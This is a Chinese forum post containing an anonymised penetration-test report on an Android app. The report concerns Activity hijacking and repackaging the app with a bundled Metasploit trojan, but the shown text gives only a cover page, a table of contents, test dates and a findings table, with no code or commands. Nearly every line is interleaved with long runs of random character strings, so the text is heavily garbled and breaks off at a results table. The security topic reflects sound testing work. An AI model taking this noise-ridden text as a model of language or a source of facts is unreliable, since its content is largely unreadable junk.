中国网络渗透测试联盟

标题: 原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞 [打印本页]

作者: admin    时间: 2022-6-8 20:32
标题: 原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞
7 p. M# U; P# Q9 d9 a. Z. v2 Y, ]7 }$ S2 W

) k* S9 h# H+ p/ N ) I% y H! E4 N0 M
- x# n% b" k. W6 |5 W Q # n* ]$ F9 ]/ r

7 M& s5 q4 ?& E+ f2 F% o; N1 b6 z( H e" \- s
/ D8 ~+ }9 c! W% F8 e& o. L1 y * Z, \3 o9 @; y9 E9 w b

0 S$ Y2 T- G& S! q: \, O* D* t : a- ^+ R# _. B u' G& @/ `; u 文档编号:                7 Y2 C* S- c" V" a& P0 k# { 2 p1 _$ |2 {( h; o8 c8 A2 H5 V

( G4 D j% K; P4 r$ m. ? 9 S6 s7 L% ?; b* P

) j9 Q6 G7 k1 l7 ]0 y6 p! E . U2 s1 L2 m/ S' }   , x4 z- n2 d8 P1 h1 o * B: q; k- g/ ~3 B. j

% v* L% U2 }2 M% f0 Z1 i( |: ` . i8 S1 `" h: C* h1 ~5 z# p4 D- k

1 N/ ~5 W# U9 E' h# Y3 y& h+ C6 f# V: x+ o   * b( s% C, [0 q( X9 Q7 [+ a8 Z 7 V7 |8 n: y: L' Q* o8 B3 `+ {* t0 Z

0 ~0 |* J2 ^4 y0 ?, }* H B 7 A: g2 h+ ?$ a. m

) `" \8 a4 X2 U! D* Q) e. b4 x + d5 _( m0 }# y8 M   1 w- P$ A M* z* g' b ) F6 Q+ Z' i$ W8 H

: @: {6 [. _5 G3 x 1 v0 x9 z# z) @5 u- J# b4 C

6 o- }, ?4 j! h' O1 y . A8 I& v! v$ Q0 u4 e+ R6 ~/ k7 O   5 B6 B+ j1 ~" _/ b4 P( r/ V2 w" c

+ p2 _0 o) f2 L7 q" T$ D# g9 x ' N7 E" }/ o! I y- o" ~8 v- ~. V- z

4 v7 x: a$ g7 V1 `' P* {: M# \$ U4 b1 G& n4 b. ^   & a+ ?/ j6 C- b A" L % H: G% B* n7 c, J' I+ s

( Y7 F* W- i8 }- d7 d' ^6 `* g% \# \2 z " I6 N& B7 s3 k

7 l$ P+ @3 F: A 3 P4 k- d! F4 |( F* {2 b( x 某某某APP渗透测试 ! w* j* v4 E) S0 c) M# F& P. A% E% E& }( r: k$ Z1 o' g$ l

( i, l9 L8 Y8 B7 Y+ b ' C8 ?5 X& q% |* ~

1 h1 l* Z! G) h% T7 P# l; j+ U7 t , D+ Y1 d3 r! M% F' F3 }6 K( N   # G+ g8 [7 `) O: G7 T8 f6 ]" |5 o, l+ Y/ T) c* L$ }2 ^! h

% `( p, W" K7 _8 t1 P- z( ^, v$ i& x

1 P% V K' P! ?4 m% }+ W2 Q ' w* n) ^; t6 G& O1 Z   * ~. E! r0 q* U$ _" g' _& O4 X" U # z; a8 t5 f u/ d$ X! q3 {, @( M

: J( S6 T; ]( o: O; P+ y3 K @8 B8 m. h" _% H

5 p- U" {# G( A6 P2 ~5 b0 t! F % q& s- T' H: Y4 q+ B( I) I) R   7 L# T( L3 M/ ~" ^ p! D4 Y& M/ U* v: V5 c8 Q

# H, r( j5 d; a* W+ @- P5 ^ " o; \0 f+ R5 A

) n- [' |$ S/ i! M- r3 Y ; ~( b% x7 o+ q* E9 `   3 D8 g7 s6 A4 j : C: Q- C& X+ u# v+ H4 H9 C& s

8 a6 k5 M8 }8 V1 g( r7 \- t* K/ i: a( f+ U1 }) p* u

% _& v, l1 o, f0 Z, q4 B" d2 e 1 K+ U$ e/ m+ ]8 O( H4 I& B. w, l 技 术 报 告 : D6 x _4 r8 E/ T# M" P' s4 e# \; Y8 b P1 E; |

x# v: {; d1 I) G. n) O U ; H3 D: y" c3 }6 x/ Y5 v3 U; ~

& e+ h$ H# Y2 X' S5 {; O4 b/ F; F+ {7 e, F+ z; ~   ; o/ D. I" e. p/ Z, N 0 h' l5 U, ?% l# @- G& b; N

7 @( }# s. ]2 G. O7 R. B: a0 ?0 r) x& l6 z

( J1 T4 f$ \5 M1 M$ K. [3 m$ C) @ & p7 t4 d3 M$ ~+ a9 v: y   ( ~6 d0 x5 o Y( Y& K + u' f* L+ ?0 |' b7 ]$ [+ f5 b/ |) q5 D

6 w' ]9 V) ~" o $ `8 f7 v/ K7 M/ E* L

8 `4 v6 J0 d, w . ~: o: V! k$ h+ E. V- L+ U4 C' I9 c   ) e9 H# @3 X, X: v$ A8 o9 ^ 9 s* L! z8 { U& M# F+ I; L, I

/ A4 I: S# D! R4 s 2 z. O0 p( B4 X$ [; z

' b! Y/ @4 h% E, t C* u5 t$ q4 n" j0 g   C3 L, ~) ^' V2 s l6 e( [1 v, w0 ^ t ' I7 x( p% `* ], c- U

8 h4 ?! A$ J5 X+ t. c # Z8 T+ `* f* Q" \) _/ t; I8 J

* ^) q c# y X# _, j 9 A( J$ D+ H. d" l/ N" o7 n   ' \4 O/ Y. b3 `" a7 h 5 @* b0 T2 d4 ]% D

. d5 A8 Z! g& k) I1 f; O( t3 Q! h0 B

% J0 r3 m4 V" E$ t) y " {; U G; r6 s' w' Y   / ~. w; L; ]8 C& u : G" ]- d U+ R) r* }6 O

2 F7 Q8 H$ k% C % M! ^; A0 t! G" i6 F" f

9 e- l9 E. I& O6 I - e& b+ |" `2 {' i# u+ E8 P   : [4 `' E% \+ C. u 5 h7 n' Q& g5 r' G$ `3 }# }

( ?$ Y, X6 z: x/ I& s0 o- S a2 G: j' u5 a3 X4 H P

5 M: v/ H0 Y' O2 t6 x w O+ Z- B _4 t3 c T& e   / L( a2 v( n& Z! V3 A9 a8 } # S* _4 ^9 d6 i8 P$ K8 F3 B* D- x$ `' Y

5 G0 z3 v* \4 l2 Q% U- W( R6 B8 K! E5 `& E, e2 X

3 P$ Z+ }4 I, `0 Z9 Z' i2 Y" [ o ( ]& L+ n8 [, b5 \6 J4 A   5 h9 l0 z/ F& C7 R6 h! ` * J' f' q3 k, c

* t5 J. E8 b+ z! N i+ B4 n4 H# V! @* V

" U0 q0 m. I6 U8 O6 @1 s# ^ . ]5 k8 @% J/ N   ( m6 X: |4 w- e; m * e8 v. h) O. A9 v# Z+ H0 t

3 G( w9 N7 M1 Z/ x / j2 N! j) h8 q

" O3 }2 \. ], Z* Q }& [$ ` - ?$ N7 G3 f5 I   " g0 m8 [. W& ?# _3 [* e5 e0 C ) W& p7 d+ `* {7 k

+ W ^+ b5 `$ U2 g! K; _1 I5 g / J8 O5 @* O1 X8 M! J

- c+ E; R! B# Y* m: ]: B . p: d7 f2 j4 @# W$ ?% E   - @* Z3 {8 ]- j; Z, {0 ^) i3 I4 W# k) z1 {* a

. p9 s8 x# \- \! X2 L3 Q$ A- Q% p" j( }! J5 Q/ u5 @

2 G* }9 y7 B0 p: q6 F& E. ^ x + z+ v! }1 @) X1 e- A' f   0 _- T5 X3 c: p1 m1 q, E+ N) d3 a / v0 e/ U* b& y+ y( `/ e. b4 d

; G. I: z! k2 X( C) ^+ L / A E2 @ k9 }

/ o3 E3 |! s- m 6 U" X) g; r _& c4 @$ o   9 M4 w/ u. k7 F( l6 S& `; R5 @0 n5 o9 H9 r, t

6 }* K J$ @& ~9 J. e1 H # g2 r8 x8 y6 m

) t, z1 v% R& [! w4 H! @, K$ m) \2 w: k, }   ! ?3 h; i$ h) n, m1 p: [5 ] + L, {% ^8 c8 T! }

: D6 ^, f% k8 h+ d b( T3 H7 x . R7 u U Z9 ]. ]! N& r7 m8 ]/ N- X8 D+ q

$ C& _# k5 ~: e* K 8 B1 |" }& C' k2 b, `   4 i; P8 x& f1 P( { . |* A9 ~6 t2 n6 m* k0 U: @+ `; i

0 G: r$ Y8 p: q$ f7 j8 V/ M. W* c6 W3 Y

" V& _. H: H1 D + y. i% D* e& j1 e4 _+ Y   4 D# V. q; z! ]3 l" v) O/ m& v x7 i% k

" r, {% x% \# @% {: y . }* e. V& C2 m2 R+ K/ X

; g* J: z }* E5 v q ) {/ N1 d$ b3 h   # t3 A6 X9 A" g) Q$ E1 R; ? , W5 f5 C( r" l$ ? y# T4 d( R

, s7 \( o$ R& y/ O/ S+ f. d' Y/ K- F/ y: K* G

8 ^2 T0 F/ W9 F. m % u- x+ K$ h' N! W7 T 二〇二〇年 ' ^5 }* D: Y, b; g $ s3 W, c* @' f5 O

8 ]8 \* U& p; h) Y8 l6 I+ ]3 J$ F6 r0 y: Z
+ |' | K+ F M1 U# `# _8 \$ J$ N k& V6 B/ L8 P/ l; [
$ }, |1 v$ A- y6 n D+ L ) h! o2 ~9 }( O2 h4 j6 Y8 g4 Y3 c
j* r/ d2 ]2 l . T) R" u- F& b, [9 g
+ S# u* o9 L* e9 ~" v s! j+ Z% K # {- K7 O! G/ K0 o
/ a, a' O8 V$ e2 W4 ]& P) p( O0 F' C$ t9 z4 u) Z: L% u
. N2 d) w7 G$ |, \/ h- Y5 R. k8 ^; R% N4 h% {% d7 P
7 x; ?& i3 i* a5 R* C # D8 [; S1 J5 _* X6 U
5 b3 o9 y w, S1 O' k) s9 O . h+ K2 _9 A$ ~% C$ R% f

5 b! Q% D. l: A# Y0 D4 o8 ~. D : e- c3 s2 l' R3 P: v" _ 目 录 1 T$ y$ I4 K, C% o 9 @4 ?2 V9 ^( T

* G$ {; Y" ] e2 y6 m# X$ O: M3 Y- m/ o4 a# t8 ?0 B ` % I% w; f/ |$ v! Y" Q& s9 V% |! y- V( T7 |. k' j$ p& V2 D

; \4 S2 B$ K2 J) F: ^8 p4 a, [& ~+ z8 t _3 }   4 u5 y: j, C6 P4 o! j! R! o% B/ h$ ]1 O ) ^3 b8 }& X# B: V% c8 s4 G

$ y0 M# c2 z }( O 1 H# a" v9 {9 ^% `. W

+ }% @6 O. ?1 S4 q. V$ }( k& H4 t7 T8 i$ N0 l' I k) t7 U5 N9 Q 1 概述... 3 - K& Y- h R) s; a6 p" b* M; R$ p3 H) ~/ P# w1 p/ \/ r9 V) W; Y( x6 F

$ x7 a/ _( g( T1 f 6 g1 G2 p, q5 y5 K

( ]; M; X8 n3 ]; s8 h" N; q 5 C) u& ]) {4 J7 j* h 1.2测试时间... 3 * B6 P- x; z n 8 C+ S7 \/ ?& Y% B( J

, j2 Z" D& V5 L% \+ D/ [5 I" L* ]# T9 E" P8 q

4 E! y. A2 ~: z4 f. o z: v : M' Z x" a. d: b+ o4 ]# s1 i 1.3测试对象... 3 , P/ T8 p- G: U. ^7 V* Y1 Z4 n; t3 `0 z5 c, ~- B

1 G+ K* i+ v2 D7 _ 5 k- ?; r6 l6 J" \/ i

7 j2 J3 G9 T) n4 U! f! F! E5 Q% d3 Y, m2 y) C+ V7 E6 Z! G' o 1.4测试结果... 3 2 Q7 S- v3 a9 s+ f) M" I & |& ?0 ]1 x7 X

7 G9 d# ?. F! P+ p# R : W3 [/ N2 w* B5 |; f; H

7 }, B6 u) n8 ^3 k ( x$ e! X7 s, T/ _4 r 2 检测结果... 4 . H- {. l- _ q: w# K# p" P) P9 v & S6 J, P+ \# U9 x+ l: X* W }4 }

& p+ q" y/ m6 D4 Q 3 [* @( W: a. S9 b

2 `5 X# }3 N, t6 t- F 3 b6 r2 a# ^: p 2.1 某某某... 4 : L' h, g8 }# B: m) t! X- P* ^& i1 I9 Y& m

7 ?6 V* ~# T* z; V! w0 X+ m: F4 V ( Q0 `* a( |& U, p5 W

1 c9 M( Y3 ^/ \/ W7 d# n2 b ) S2 @& c5 ?; D- t+ ]- ` 2.1.1检测目标... 4 + ?! b% j$ g) R/ p; k# J& h2 K" i, } ) r5 s v9 e% h

' E3 |7 o( v! x& d( n/ @7 y$ ~" ~; j" e3 \5 B

0 n' Q# E) X. F! R I- n + Y9 @; l6 |! G5 ?8 E6 e- e 2.1.2检测结果... 4 X4 e. e6 z+ @ * w* |# C. O0 P' U# C6 Q$ k/ P

- t* W: Y+ M- P- G! w! }" G ! x9 j3 J- G- [2 f( {

. x1 N: [, P |7 n5 f; H V ! H: ]/ y x; T0 d 2.1.2.1. 4 7 o% q# `5 l3 P% X+ G - \8 s+ }9 G j7 X' r: [

, z! I7 |' \0 p) r % J7 g& x7 T* V) f# S: [1 ]- u* _

( m9 Q, t Y& c q/ t3 G/ |- V$ N1 h" K 2.1.2.2. 6 ( \2 U0 A, v8 v: V; R % r! b( T5 @+ o" r0 d9 X8 E* b

% Z0 l# `& Z9 D/ k" Q 1 C, ], o& R6 _% i

t3 W% I6 E6 c- h3 h6 a' U& ~5 u7 w* } . y) g" b) J9 Q , O$ p" \8 l) f$ ]$ j: |, j, K

# n! I! F8 U2 F0 }8 @" W5 m2 Z6 I# {: A
; d. g$ N: t- E* @; A% F F. J, t+ J: {$ K+ |- ~) H8 n
' r: `0 B) w9 m8 R ! _% e3 t9 r# h& C, ~2 S
$ ^6 `, L H: Y9 W% ^; F+ b D , X$ o% b. ]& I$ U: _" J- C5 b
% i: ?* c+ D- q' \" N% @# ]) k" A5 t

% l' Y; `2 [& X7 m, P/ Q9 o# \- C/ J2 \0 S' ?+ V/ d" N 1 概述 " b* H+ _8 D% e% c Z2 U! | }5 u7 G6 q

4 ^( u5 H" w7 M! f' R5 y1 Z9 h3 g/ z; t

Y; n; l& y2 n0 J( y8 \0 z ' k2 E( X7 F' D3 ` 1.2测试时间 e! n- i" E5 a2 c4 e+ L: `( _ ' [$ Z4 P! ], F% k) v

) ? T: S6 }- B4 f0 D) N6 M0 c9 z2 M+ S% B# D& b2 R0 d; b l . S y' G" S7 H$ T% S2 W8 N8 M& D( ^. f1 ^& W4 j0 H. W# t; N/ V( \$ ?+ c( ?% V# C5 O. `0 X! u e4 m- ^5 O M8 N- G, f# k |/ Z i3 i6 M- o! w3 w( v* J" m9 v }" X" Q9 G4 y7 V% K0 @8 E7 v' Z8 {# x1 O2 ?" T/ L4 o" ^- Q/ e& f$ g1 T5 n' A B6 | ?7 b: R5 d- B) i+ Z ]4 }+ C% v) J& x: K4 N% [1 n* U0 c% F- h) M T! `* k P3 k" r6 u( o1 S! V+ v# G; I$ [. j) `0 d% t7 B/ ^/ I3 Y- l" E; D* f* n; h7 {6 l2 Z J$ V- `# M. Y: h N/ ` ?) B4 s; H" J: J8 f1 {1 \- b6 ]. c; I! v# }" p3 y8 K5 T3 u+ c: E6 r# O6 E: ?8 L/ H ]; P7 c/ Y7 }/ m! V2 H: @3 `/ l1 Y: E* C8 F. b+ m) q2 v+ Y7 }' C/ ?5 p0 |$ x5 z- o6 \& y& K- p h h1 W; a* k S% P# {" i/ o1 I) S7 q4 D5 t0 q' d* ^5 b5 `8 W! W4 D V: D
9 E& R; g0 s: ^5 L1 w- s' W$ s& i+ Q/ u9 W" }

2 l& h1 U6 W) V5 D- A' N) j0 s) W " [% o. W- B& {6 X B; h: d 渗透测试时间 ' w& ?- u* g" s1 W5 ?& q; w 4 @8 j" g H0 B( E

' V1 v" r$ u( W8 { - \5 P. @5 y6 ?0 q( q0 z
3 j8 B2 _9 C- c: Q , h* ^2 s. s! a5 n, P, i2 N

8 z$ S( W( C5 ~" g " d# F0 N$ ^" x$ n) p8 F 起始时间 : ]' A/ q/ T9 p0 _7 N5 @) `! X; X4 j

5 M: q' e) `6 s& P % B' N* u+ R7 M3 C Y6 H+ a
! j5 C; p) Q* E/ e 1 N. I1 Z8 Z! ]- x& c3 c+ x, x

: N" I9 \ R! { . }' z7 j) Y k+ n& ` 202046 + s* N' H$ E6 Y E/ M# [+ O9 T 5 l7 l( n7 v7 q6 \' s

\( n7 L% m, p; Y! t7 r 9 k; D0 _5 I$ }0 Q6 c. F/ M- j/ I
2 w4 I$ J, e' ]$ Q2 C3 N0 l 3 M; {0 O; ~/ k. ~; f

3 B. ~8 y6 b% m1 p- E9 y" [2 H( a1 X8 u$ o 结束时间 % E0 H( `! u4 g7 y! t6 J 4 S5 z: k" `! W

+ R2 z6 J3 u$ J# y 5 O N8 D+ E, V0 `; G3 _& c
& a0 K1 k1 P; U / `( t% w. x$ Q

7 N" n3 Y" y+ D+ U* n& R ' s. H( {) h* L; `7 E 202049 5 _& T; ^) W. T* T 1 W9 g( Q$ N: I0 l8 P. E0 U2 h

3 q; C+ W. R4 I I 6 L: L- z- ]7 n& ~
; w: l7 ~6 w4 S' u P, q; l+ D3 h: Q8 }4 v! l, I c0 }+ Y

, x' [8 D! k# U' D8 @ ; T% F z% }8 b2 I- d2 x) r8 n7 B 1.3测试对象 & l- c. \$ L2 `1 ~$ H9 \) h6 d& C! y( c

! ^- I8 U! ?. R [# Q1 t M & d6 n2 v/ H. k* a: A/ z

& |+ j7 \8 d( ^' U c% \' p" p5 c, h; H1 E 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: ' L+ h9 r) i- D3 E 6 K5 @0 W$ J7 ]8 @

# w! F9 {: S$ b/ [ ) [1 @ y" ]' }5 D

9 V" H9 ]& @2 m2 W/ A. p" y- |$ h 4 ~/ t2 w# C- Z U; X 1-1 检测对象 5 \+ n: G) U. E( F 7 y. V. `- `, i6 J4 B

& Z O O% p7 F4 i# m& H" A 7 W9 \4 l0 E( @' E k# g ! S+ I( H; F* ~- \1 ~ x6 S1 w- E) J9 u& s2 J, Y" S% X# `" J% ?5 n/ ]7 b: G3 [' n6 V: F; j# _& k+ S" \7 L" E( {# M$ o4 J( Q) y- Y* b- d! q* ~& r4 q& y; ^; s% n* A- P9 I2 b" ~/ A) s. U5 S% ]7 z, K* ~' B# c6 I/ m" \/ s( n' Z8 l x' {' G, `1 [) @. c9 j4 _0 E3 @# h+ ]" O3 e$ n2 R) W' h9 u' L3 L% P# O! _! `- y; s( f: I% [- n6 y; k- e, Q3 n( ~2 P: |1 T% F+ [" J3 B- u( w/ r' D: m1 j7 P; e/ l2 d) `# O0 A5 {% @. `2 m+ u) c) ^8 v b* v* _4 X/ m1 f7 L% t* @2 v3 w+ @ K$ c$ [9 p, K$ A8 o" e N& C( V0 I6 x- Y3 n# {/ l( B5 c- L$ V: g! @3 S/ k @0 m" q# f- L# `# B+ r: D* P) q; y4 b9 c, @; m: z- [3 m/ W) v. E) x1 ?; H. s) ?0 R/ u9 \+ c9 k' V* h. E# Q" t# ?. n3 D. u. |+ M b7 Z; f2 @. g3 T) q5 A Q1 b( l# c0 c; Z7 x6 k) f* S1 u
0 I- w$ x8 S, I0 v ! w+ _) d) M( P( P$ H7 C- V

0 R2 v6 P( u- c1 w; A$ `! p, ?: @7 {9 G( l, j( t, @' ]* n3 J/ f6 r 序号 2 O7 n8 ?7 v# S 1 f t( N" N+ K t6 A5 r% d

2 w6 p1 v5 R, `0 r1 e) p3 X , \7 N# P# C# R# r$ r$ \
7 E# ?: ?6 h: `6 h' q: T" i3 w; ]: ]5 V" u# Q# B

% r3 _; ?( Z; p# V2 _7 _0 u) O * [$ {+ L+ v$ z0 ~6 Y 测试对象 ~/ t% i1 V; U% s' |7 D1 r ; |) g s }, R/ q! L6 H

: a W# w! E2 F% p3 X+ S * I) t5 P. C& u! I; O
/ s6 I: Y2 ^! a1 ], y , @) W* Z" V0 F* z8 v/ Z; E Z

8 C3 Z) R$ o0 {. K8 ] * _" `$ \2 q/ T1 x4 m8 Q' x 测试地址 2 K7 L: f) m q, x , z% _ R+ i/ U0 E6 j

( r2 R* t; l5 W7 j- T$ {" P; Z . v' ^3 l; z; ~4 m$ _
$ q! {7 m' `3 G1 @: C1 S+ d4 j# i: u5 y! @# |0 {" z9 r

7 \. \( X* p+ y& X4 L8 b4 K 7 D2 T6 z2 G& K; O) { 安全漏洞 ( ]7 \- G( @# H& S3 P0 e9 l" L& ^8 y3 i9 a% Y

! ?! h W. M' P, P2 E5 M: S9 { 6 o5 i( i$ [# C. [
, L+ W3 v. @: A: C# @ % s; y1 [1 D/ k8 _3 J) j

2 j, M* M u9 g: r9 l* G, c& i5 U# _2 z. s0 m" |& M, j. o 1 4 c+ q$ Y% Q' L$ \% z 7 x5 G/ a5 z4 w3 R0 A

9 |+ n$ J2 H. k' S7 p) b1 i $ |" Z$ V3 K, T2 L. }
4 k+ `0 o4 t% D + o! J% q+ K$ U

* V4 P7 ]9 y( S1 y2 x0 J1 X( ]5 ] | m( Q& L 某某某安卓APP * M M$ Y; b: z) G ) D$ L* I2 T7 y! {2 I) S* U

+ q P+ U2 m, _' y& b! L! F7 w* q& v( ]0 y' A7 _
1 _4 l4 ^: A4 r$ a& e) X; S: S, Z( w% b6 B5 F

" T' B5 }( C( N2 n+ B( _ 4 J4 @0 \2 N+ w" K6 ~$ [   s' ]: U- P! p1 N# e: ~" ~" l9 ^6 Q$ T' F$ o9 S( \

7 g/ n" D h" G " \6 M0 e8 a7 f8 T# m
' y$ \& _0 a. ^- `- T4 Q# E) L) c$ @% c

5 k& T* O9 W3 T7 ^ ) d' O! ~. O( y" }. _ 2 8 ]; p. |& H, X# z! s* N% s, Y' z0 Q+ o6 m( l0 E5 g L7 w! G

! m/ f3 c" Q- g& _& \ 7 t* [" ?" Q$ {: L5 f* k& y7 v
; ?& y) _. Y4 A( E/ G * v; w+ h- X( L& P W7 F

7 _0 d+ c! D5 l( [1 X % }4 } z1 y: e 1.4测试结果 3 o4 d5 v* y! _ ( R2 U1 x1 R# E& g B; ~' Q

3 q; A3 T: D% J6 M; H* k. \ 0 u ~& P/ V1 \; x! w8 k

$ @! Z- r" V) F8 H/ _) t9 n 1 q& J W. w( i: n3 J( Q8 N5 c 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: / B) n& e8 ~! H0 @4 l " q2 g$ ]* L# a

l9 O9 Y* J0 P6 M+ Z H8 p* f6 l( r

# W6 y- i* Q- v3 k 6 D; H; i; H1 k   $ n) P- x P' i" F. x j# L 8 o V$ k6 u$ O1 v! v- O+ e

4 |, {5 Z6 e7 {' w3 D & b* ^8 M/ ^! \) `: v
1 n, x" C) t+ l' x" T: Z ( g' Q% b* f2 G2 U" x! q0 ]- e 9 V0 S6 g3 s0 r' J" n. n9 H$ |! A8 W% `% K9 C+ T% {0 O- \$ a& j0 A2 ?% L4 o3 T0 [! R$ Y0 I, |: p7 g& d$ v( ]7 v6 k6 w! D m, ] M1 Y5 Y! A" U4 j; R! _( j7 Y5 Z, ?5 K+ g6 ?1 I- c2 Q' z7 [; w/ d# J. |1 c8 f2 [' P, H6 c/ B" S" W8 i3 V: Q, b( z8 u/ E! q9 E" R, ?# E" B# t0 m. J0 a5 O7 o% W) N$ S- \& B& l$ D5 _) c$ J# p1 I: `7 ~1 a$ e# D6 P# A) g8 j7 Y$ G3 U, q: @5 x' |3 I* f6 |& f1 ^8 m: [( ^% j0 k9 o8 w3 E9 k# w/ g L. ?: \) a$ f- f s( g) W2 {% v. _7 _& d6 E% A# X5 `9 w$ R& _+ [: O7 F! U" Y5 L2 J# R4 b' r8 S e4 a+ b! t( y2 I% C& _$ h- @3 r6 F# ]+ e) f- F. V' j% Y3 }6 U( [8 z3 H; K3 n# r3 R* q# f8 h! D( `5 x* f2 n: e! w+ f+ K/ c/ e" u# H7 g( @' t; e& g5 @) Z/ C/ f, f3 I) ~4 M0 d5 {) h' U1 @9 R( Y7 f7 Y z# h8 j1 Q2 @( x, ?7 G' G/ N! ?; k. J7 Z9 ~% L9 H0 r+ h4 I, M" M8 v$ y8 {7 O8 w/ r" B" `% g' z: A4 I9 A+ p" `4 v1 k4 D) R1 I& \9 o0 O# m) y0 P) \4 i! P& N/ k( x6 _, J" p7 ?, r0 `; g# o% I4 Z3 `7 y. b0 i4 `9 m0 p9 X; x, J( N$ S. v$ m- k! V' a, Y7 u. B! | d) d3 s+ u+ [1 U# {& o7 P I% t& d5 `7 K! G( m9 A! ~+ r1 C; f" l0 r) B) B: L3 i( T% O) Q+ T: Z6 G- g5 M- S! h, _' u" o* N( R& f% c: H
5 f( D* u! R2 W- j% Y 5 l, \, ]" t% {' k2 I+ k

. s" X0 v7 j2 q; `. M 0 m* [' _* ^6 L* s F5 w) y% F4 W+ l( ? 序号 3 s/ q: c: z6 Z8 z/ f1 q 3 c1 c. _; W, Q6 ?0 `0 [

$ j1 l0 s5 A2 d1 C5 \ - ]( H( Z+ ~+ V, ~
$ J: n5 ?9 O/ O2 b V: B% R 9 z4 r4 g$ g8 n

4 U# F6 d7 K0 j4 V9 @4 J- G3 b" ^2 B 系统名称 / x) K y! L, y1 b0 n8 i7 r; I5 ^9 ?0 V J# w. B O# n

2 R2 L2 B, M( u4 h: W 1 c- b: |$ T* Z, R" a6 k- t# }- f
7 K% r$ L9 p. T1 y2 q% r/ b( l6 L$ a. D, q7 }' }9 ~ p

% ~) E0 k8 C! ^ M c6 Q6 t. l6 L- |! F- ^% z( K2 C d. w7 J 漏洞名称 + D: C/ X+ W: ^ # e* s) B2 l; b6 i

3 @9 `. f3 j2 R# ^! I" O# S6 l & H# N! ?! P0 X. Z! |0 G) r5 h3 o) w
0 A* k0 v7 K# w% u 6 o9 ~. X% r1 _7 F

- p, n- V, ^. k" f- L : i, c4 T) O+ J6 p' F, F+ f' J% T 漏洞危害 - k0 P5 o% e' l 6 e4 x+ X! W7 ~& X; `

; G, [0 \. o9 n+ o1 C9 y+ d& I * X7 d% C; |" V# i/ y" v% K
& h* \( y1 a+ q & _3 |4 d+ K# D3 p; | t& u0 j7 F

- e, U0 p* y6 l8 f ! z2 g# J2 s7 i q) e' _. T0 J% u 修复结果 9 f3 X9 U. ^, ?+ L/ u 9 X- N0 k7 G ?1 F# e5 O* ~

% J- \# a& H; Q6 s' D' i - Q' A7 E1 p0 b( p; C4 {
9 q% P; Z8 e; w0 ?" F; N 8 z) W: U( f; I% k3 ^

- G7 E: J2 [$ g* U. G8 ^: D" |# [- A! | S5 ?$ q! T 1 # j$ i4 q: U9 C$ T1 T) T f0 q8 `7 v4 p- c# Z8 ^ `' V5 O2 R

+ z* r' F/ D5 p% n* {+ s- K. r8 `$ A
7 Q9 S) h/ M" E! x4 Y( \+ l2 _$ f$ Z ( @) Q R& M8 t$ ]: s; ^

. F+ e+ i& ]- f1 a- y; O5 D6 i2 T' e' l# c0 e 某某某某某某APP ; Z f8 i/ f$ G8 l1 F0 T8 j5 ?' g7 U4 Z9 T2 L9 l; j5 r, D

- p: s# I3 U3 F0 _5 x) `! R ( I- Q) C. v H6 B7 Q& Q
: Y! G! I5 M; a7 F w0 V ) I, f+ \7 S. p3 }

2 k$ E; l$ a8 y- N. q5 H: S. ~ . j& b; u: ?" N7 Z+ y+ w0 S, \2 ~& d Activity 劫持 7 l" v6 h" ~8 Q" _ " r+ H% P* @5 `, o3 B% g: H

7 O; {0 B( g. R {" V 4 e, v! K3 I9 C; @3 O/ o. G

6 ^3 W( L @$ U( J' F & o1 {, |( F% d" p T$ ]   / K9 K* b+ W6 \ 4 e5 R6 |5 g7 Q8 Y: z9 n

6 F3 v7 h8 b+ m- y( ], G+ G# s 1 f) i9 l- u" O- p/ ?" k) [7 S# |
; C: S- h y8 x1 t3 c. f " M5 X2 L" [% e6 `

# u# |: M9 h' }! i2 @) ^! X 6 A0 u$ }0 T' q% l 0 O# |4 H# ^% Q. f3 y0 n / ?. o3 ~* Z$ m7 S1 L

; g2 _7 R1 Z$ U5 g- {. C ! y: {, d | s4 p1 Y
7 a" j) e$ B; ]& c5 H 1 ~% @$ L# V, c. V. i

0 x0 A2 O$ S; R 1 B/ u: B4 O$ X6 U   M* B+ ` ^, n : m" e# u& ]8 _; }* K

+ H1 W: H* z& O: S( k- V7 N0 @# I# E$ d1 H# V; R$ Y
0 u% w0 v/ G/ ^% X3 h$ |# T+ L & d" a. t( o/ L# R6 x

- d0 h7 r% o3 q" Y3 t. W R2 g* f% m6 X7 e3 R& L1 t0 I 2 1 p |, Q: d8 J* C- K! _- D * b3 {$ t$ ~( y0 ~

" v7 A& A0 R+ j; K* z& }) n# j 3 e8 E$ [# C& E/ F; J
J9 y( R0 k h' c# r $ f, W9 d: o7 E" X

. w9 A) N8 N9 B9 C , i, ]& G9 f% h9 o& w3 @ 某某某某某某APP 0 l! _4 n+ G8 y! t* L 7 }5 B1 `+ r/ v8 L( J% ^

# G( F/ O. |" H; J 1 o) L, {: D0 w7 K' g. U
# y) g$ Y* e9 t: E3 K+ H' Z- o z 5 M+ Z3 i& n/ n) y% J

- ~. A U* I7 w 0 i9 G) H/ d+ _' _3 @& s 反编译二次打包捆绑木马、篡改APP代码 1 n+ c6 k" Q" j6 f* T, R! Z . F; w" N; n% h+ y( o: Y: m

) R$ C+ M* Z4 @" C; j# V4 E& X. A' u& B" \% }5 b. w
9 S+ h# K$ Y8 D% q Q* Q . D V$ }( w( N$ y$ b, C Z9 F* t# I

+ W) `. b2 S6 {9 N8 j - Q8 N2 f7 ^7 M % Q9 C! A' g! Q* d # a1 H i0 k3 @) ^4 r' W6 h

2 ^# o$ u% V( H" ^. R5 ~" X 3 Y$ d9 }1 V% M, s
' [4 t9 t: d1 u 6 ~ k0 @+ r: Q2 q9 |+ q

7 t! ?" Z% T0 O+ @3 X( V" O 3 F, h5 p( u% I0 x+ z   2 f- N+ f3 U/ w; y; `, M) P& ^ S: {+ I" j4 j# n

0 n2 r% L# O G ; X0 X% Z$ t8 T9 Q9 Z, |3 K4 v
8 F6 K _5 s6 R+ o5 F. W0 ]/ \6 ]; s+ f, r" L' L5 k, \% V
8 o6 e& V1 g2 i2 s) K4 H8 f% M" ]5 b6 A4 j( P- e: h7 y

' c, \$ f. p _1 K# n 3 y7 ?" |( e, b   8 |. E) G5 \ z/ q# d $ l: q. E9 f* k6 y& u

9 f" V a7 d$ Q$ u. y3 E1 X1 z3 ]8 K0 v# x; Z, Q; }5 w

5 {) V2 n) E) f* z % o1 b4 x1 ^" O& M 1-2 测试结果 4 W5 s0 a D* q- ^2 e , F7 s0 ~, b7 Y3 ~

